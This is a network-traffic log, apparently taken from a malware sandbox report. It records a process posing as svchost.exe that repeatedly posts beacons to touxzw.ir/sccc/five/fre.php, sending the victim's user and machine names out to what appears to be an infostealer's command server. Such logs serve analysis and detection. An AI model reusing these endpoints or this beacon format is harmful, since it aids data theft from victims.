19	192.168.2.4	49756	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:50.812558889 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:50.820013046 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:51.567676067 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:51 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpBc6oECriO%2FuF9lTWacbBQVWW3PAK90Fzpr6BXRBd8I7RsHs7fEEl4H0mWSBUJU7LUE9ykrWJSPvolb7%2BgvJfYtfItPhp1aEP1VVvhNHbDg0NoaiuGCa1Utq64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26c52e4c0f3e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:52.716670990 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:52.721740961 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:53.545025110 CET	844	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pcg8bYnRbNNd9lMKBNblxFrAVrqA3Bw%2FNun6kFndLmE3i43FgvMrSAu2C%2FLt1U%2FusgodzWY0FLv4fGOdqUrYyDhB%2FxHx4PjSPvbco05cwvXHbLFCDmfV25uFJ7I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26d10aeb4405-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:54.687501907 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:54.693351030 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:55.482131958 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p29ewD8BqJt2p3tOf%2BNkoAsnJu46QqXfnXHyklFP7kTkA300tlmyBnGhWy5Ly5ggMcxCI1NGuyDXS%2BSjG%2FViJL%2Bm2J3cSEZ2EDN%2FOl%2Fyy06wk3q3fmEEa53O33Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26dd4c980fab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:56.653667927 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:56.661304951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:57.403055906 CET	825	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:43:57 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwy0NWrP%2FT8rjPNKSCTXLBzTtKl4raQXQ2%2BuJ0MnjWI6vIB8MUgbINdSc2iWSvG%2F3IRKaP9EERbRWnk0m9bX86e%2BgPc%2BNIRP2W5r7mdOZF78Uo0voVE35yUnhD8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26e99f724332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2180&min_rtt=2180&rtt_var=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:58.700609922 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:58.705694914 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:59.467822075 CET	840	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjjCxvx63wI90knRo9AwyDiTdCrfJJhM4JIb07wFk%2FDWc14R37hc9D9u3zAOUbjXecK6aFZNH5XAc1CzGljb3uoB4oIloNpfv7h8zKUurKUOmgg3Ramjz%2Brrrn0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26f65e6042e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:00.625502110 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:00.632178068 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:01.394223928 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucfdw1p0vsdX3MrPgXqONb%2F5X3U91J2pq5vFa5CvgJmg6RvStPsdQgDxFK40tiYHPRwqZ%2BuvcLuXzlCC3InG1%2BrDB3bWXLNCBVWIneju2J65cOOhu4smidzorH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27026f59429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:02.543962955 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:02.549015999 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:03.203638077 CET	840	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyixOu8bPJZUMHk6fKK2oks%2BZeolGsIjcDpI2F6JXA5LvSV67VXRWATVkKQFPzJAyMyvgDsKCtubuvSRrCD7bqtqFnzW1Fw0zWGKLOD2QpI2OXUsPk%2FZn3ovI00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b270e6bc90f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:04.343209028 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:04.348268986 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:05.170475960 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3i1BaNRkfT1yxgFhWNLYBZ%2FKIHnn0cMZl67%2BC0%2Ftx04yWhq2c60MCYV%2ButgCLyGtHs0COJ82rbeaAZxtt4NKra3UvpXuxF964%2Fo%2FJsuK1gvkGs2stwKwlefjzc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2719c92441f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:06.332422018 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:06.337593079 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:07.123472929 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:07 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWZXmka3U9xJ3t09teTDzubFt9L95dq3bdycZWmcy9B2aRVPZmFtF6Cw89tjNKcMlefKCndMDSUEWwqwcuGw3VWaktBIC0bykSP0%2F2l1oPRyGMxrUohU16k0G64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b272619281889-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49766	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:08.285682917 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:08.290721893 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:09.168638945 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlnvLbY586dULNONXkGynMrh8TvrO7bG1s61e2QWoKuRFlQuRlGS6FZNmWAWRw9Pan6%2BOPRtP8yRvuOSekGJmXkgEDucU4q%2FZWZ5aHFg1YDDkH97chGhanBuLY8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b2732b83b8c41-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5176&min_rtt=5176&rtt_var=2588&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49768	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:10.311546087 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:10.316672087 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:11.054193974 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 02:44:11 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pZVTifE%2Fx3r6aj7zRnZRCWaTUIi3rvf8XaNcxq1urzmOlSKj%2FXLkFykoxxFmZ4%2FsT2%2FRjiEEbv2O8V5DRwwRJon2yDslJsB8Ix5g4LKzADZaEEjzy2SXKCqbHw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b273eeca65590-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49779	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:12.211334944 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:12.216352940 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:13.092571974 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GDv3EGIZTvURG9N0DxAH9zQcE1LA5n9T3%2BuWwadW4URMXIbj0lYspm22VA0HAWn34N1t7chuFULtvulAMu10sQhdXUqac%2BupfunMQAPqqu%2FB6f8dhu4Y04773oM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b274b9e2a4408-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1899&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49793	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:14.252463102 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:14.257584095 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:44:15.060792923 CET	840	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:44:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMIRAQK5kqNqk3IjaX8sMizzQbq5c04w8Es%2FBSo1UUK3g9sT86P8jlmi9GDISR3QOqjIO9QdRkGST3WhCnugzUzEC2n7jxN05QDBeR7Bb0Gearnyu%2BPt26JsrO4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b27579d661831-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49806	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:44:16.232182026 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:44:16.237190008 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
